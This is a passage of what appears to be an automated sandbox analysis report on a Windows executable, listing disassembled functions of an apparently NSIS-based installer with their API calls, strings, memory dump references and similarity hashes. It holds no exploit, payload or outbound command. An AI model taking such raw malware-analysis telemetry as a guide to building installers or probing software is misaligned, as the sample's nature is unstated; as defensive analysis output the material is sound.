                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                          • String ID: F$N$open
                                                                                                                                                                                                                                                                                                          • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                          Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                          • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                          • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                          • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                          • String ID: F
                                                                                                                                                                                                                                                                                                          • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                          Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                          • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                          • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                          • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                          • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                          • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                          • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                          • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                          • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                          Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                          • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                          • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                          • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                          Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2124223179.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124194375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124276651.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124299460.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2124621421.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PodcastsTries.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                          • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                          • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                          • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                          • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                          Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426176,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426176,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                          • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                          • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                          • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                          Memory Dump Source
